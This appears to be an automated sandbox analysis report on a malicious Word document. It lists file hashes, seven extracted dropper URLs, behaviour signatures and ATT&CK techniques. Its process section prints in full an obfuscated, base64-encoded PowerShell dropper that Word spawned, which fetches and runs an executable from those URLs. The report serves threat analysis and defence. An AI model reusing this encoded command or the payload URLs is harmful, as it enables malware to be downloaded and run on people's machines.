Analysis

  • max time kernel
    116s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 23:58

General

  • Target

    ff0ebab531232f9ae8d5b2ad78ace8848adffedec41de03b8676c956c14c6015.doc

  • Size

    184KB

  • MD5

    18153b00c4bcc38b4722b6d8a6ba7d8f

  • SHA1

    12efef41170425598e89096a4069e0feee05bc96

  • SHA256

    ff0ebab531232f9ae8d5b2ad78ace8848adffedec41de03b8676c956c14c6015

  • SHA512

    32d4a1b7328a0d39dff9228dcaee00e617a040c767643458761107b682dc09fb3829b075ba0d13d4847babe9f556eaf2019acb9cfa31f5a38851abee1c0c124d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://thestratumsphere.com/wp-admin/wODL/

exe.dropper

https://tmlsconsulting.com/abay/RI/

exe.dropper

https://is-yap.com/wp-admin/AA7/

exe.dropper

http://chendonghui.cn/wp-content/Z/

exe.dropper

http://veterinariapetlife.cl/4br/AXC5/

exe.dropper

http://blueseasports.com/iv/

exe.dropper

http://webdemo.cl/clmd/hVf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ff0ebab531232f9ae8d5b2ad78ace8848adffedec41de03b8676c956c14c6015.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1392
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAGUAQwBUAE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIAaQB0AFkAYABQAGAAUgBgAG8AVABPAGMAbwBMACIAIAA9ACAAKAAnAHQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQArACgAJwAsACAAdAAnACsAJwBsACcAKQArACgAJwBzACcAKwAnADEAMQAnACkAKwAoACcALAAgAHQAJwArACcAbABzACcAKQApADsAJABCAG0AOABmAGMAbgA5ACAAPQAgACgAJwBEACcAKwAoACcAMwAnACsAJwB2ADkAJwApACsAJwAzAG0AJwApADsAJABMAF8AcgB1AG4AdQA2AD0AKAAoACcAVgA0ACcAKwAnAGEAJwApACsAJwA4ACcAKwAoACcAOAAnACsAJwBsADEAJwApACkAOwAkAFIAMABuAHoAZABxAHUAPQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAoACcAZgBsACcAKwAnAE0AdwBvACcAKQArACgAJwByAGQAJwArACcAZgBsACcAKQArACgAJwBNADIAMAAxADkAJwArACcAZgAnACsAJwBsAE0AJwApACkALgAiAFIARQBwAEwAYABBAGAAQwBFACIAKAAoAFsAYwBoAEEAUgBdADEAMAAyACsAWwBjAGgAQQBSAF0AMQAwADgAKwBbAGMAaABBAFIAXQA3ADcAKQAsAFsAUwB0AFIAaQBuAGcAXQBbAGMAaABBAFIAXQA5ADIAKQApACsAJABCAG0AOABmAGMAbgA5ACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVwBzADIAYQBtADcAZQA9ACgAJwBNAGsAJwArACgAJwB6AGIAJwArACcAawAzAF8AJwApACkAOwAkAEMAYgA5AGoANwBmAGEAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAYwBMAGkARQBuAFQAOwAkAFcAdQA2AHcAMQBxAGEAPQAoACgAJwBoAHQAdAAnACsAJwBwACcAKQArACcAOgAvACcAKwAoACcALwB0AGgAZQBzACcAKwAnAHQAcgBhACcAKwAnAHQAdQBtACcAKwAnAHMAJwApACsAKAAnAHAAaAAnACsAJwBlACcAKQArACgAJwByAGUAJwArACcALgAnACkAKwAoACcAYwBvAG0ALwB3AHAAJwArACcALQBhAGQAbQAnACsAJwBpAG4ALwB3AE8AJwArACcARABMAC8AKgBoAHQAJwApACsAKAAnAHQAcABzADoALwAvACcAKwAnAHQAbQAnACsAJwBsAHMAJwArACcAYwAnACkAKwAoACcAbwBuACcAKwAnAHMAdQAnACkAKwAoACcAbAB0ACcAKwAnAGkAbgAnACkAKwAoACcAZwAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAvAGEAYgAnACsAJwBhAHkAJwApACsAJwAvACcAKwAnAFIAJwArACcASQAvACcAKwAoACcAKgBoACcAKwAnAHQAdABwAHMAOgAnACkAKwAnAC8AJwArACgAJwAvAGkAcwAtACcAKwAnAHkAJwApACsAKAAnAGEAcAAnACsAJwAuAGMAbwBtAC8AJwArACcAdwAnACkAKwAnAHAAJwArACgAJwAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEEAQQA3AC8AKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGMAJwArACcAaABlAG4AZAAnACsAJwBvACcAKQArACcAbgAnACsAKAAnAGcAaAB1ACcAKwAnAGkALgBjACcAKwAnAG4AJwApACsAJwAvACcAKwAnAHcAJwArACgAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAZQBuACcAKwAnAHQALwAnACsAJwBaAC8AKgBoAHQAdABwACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwB2AGUAJwApACsAKAAnAHQAJwArACcAZQByAGkAbgBhACcAKQArACcAcgBpACcAKwAoACcAYQAnACsAJwBwAGUAdABsACcAKQArACgAJwBpAGYAJwArACcAZQAuACcAKQArACgAJwBjACcAKwAnAGwALwA0ACcAKQArACcAYgByACcAKwAoACcALwBBACcAKwAnAFgAJwApACsAKAAnAEMANQAnACsAJwAvACoAJwApACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAGIAbAB1AGUAJwArACcAcwBlACcAKwAnAGEAcwBwAG8AcgAnACkAKwAoACcAdABzAC4AJwArACcAYwAnACkAKwAoACcAbwBtACcAKwAnAC8AaQAnACsAJwB2AC8AKgBoACcAKwAnAHQAJwApACsAKAAnAHQAJwArACcAcAA6AC8ALwB3ACcAKwAnAGUAJwApACsAJwBiACcAKwAnAGQAZQAnACsAJwBtAG8AJwArACgAJwAuAGMAJwArACcAbAAnACkAKwAnAC8AJwArACgAJwBjACcAKwAnAGwAbQAnACkAKwAoACcAZAAvAGgAJwArACcAVgBmACcAKQArACcALwAnACkALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASAB4AGQAaQB6AGoAZAA9ACgAKAAnAFYAcwAxAHgAYQAnACsAJwB5ACcAKQArACcAZgAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABGADEAaABzAHoANwA4ACAAaQBuACAAJABXAHUANgB3ADEAcQBhACkAewB0AHIAeQB7ACQAQwBiADkAagA3AGYAYQAuACIAZABgAE8AdwBuAEwATwBBAGAAZABmAEkAbABFACIAKAAkAEYAMQBoAHMAegA3ADgALAAgACQAUgAwAG4AegBkAHEAdQApADsAJABLADMAMgBxAGIAbAA1AD0AKAAoACcAVwBlAGMAJwArACcAZAA3ACcAKQArACcANQAnACsAJwBfACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABSADAAbgB6AGQAcQB1ACkALgAiAGwAYABFAGAATgBnAFQAaAAiACAALQBnAGUAIAAyADEANAAwADYAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAbwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAoACQAUgAwAG4AegBkAHEAdQApADsAJABQAHcAawBpAHMAbQB3AD0AKAAoACcAUgAnACsAJwBoADUAZgAnACkAKwAoACcAcgAnACsAJwBsADUAJwApACkAOwBiAHIAZQBhAGsAOwAkAFUAdwB0AGIAdQBuAF8APQAoACgAJwBOAG4AJwArACcAdQAnACkAKwAoACcAZwBfACcAKwAnAGcAJwApACsAJwBhACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQA2AHAAYwA3AHkAOQA9ACgAKAAnAEQAYgAnACsAJwBuAGQAJwApACsAJwBhACcAKwAnAHAAbgAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2600

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1392-136-0x00007FFAA2CD0000-0x00007FFAA2CE0000-memory.dmp
    Filesize

    64KB

  • memory/1392-138-0x000001D1F9262000-0x000001D1F9264000-memory.dmp
    Filesize

    8KB

  • memory/1392-131-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-133-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-134-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-135-0x00007FFAA2CD0000-0x00007FFAA2CE0000-memory.dmp
    Filesize

    64KB

  • memory/1392-132-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-137-0x000001D1FB6D0000-0x000001D1FB6D4000-memory.dmp
    Filesize

    16KB

  • memory/1392-130-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-145-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-144-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-142-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/1392-143-0x00007FFAA4EF0000-0x00007FFAA4F00000-memory.dmp
    Filesize

    64KB

  • memory/2600-140-0x00007FFAB8E50000-0x00007FFAB9911000-memory.dmp
    Filesize

    10.8MB

  • memory/2600-139-0x000001B2259C0000-0x000001B2259E2000-memory.dmp
    Filesize

    136KB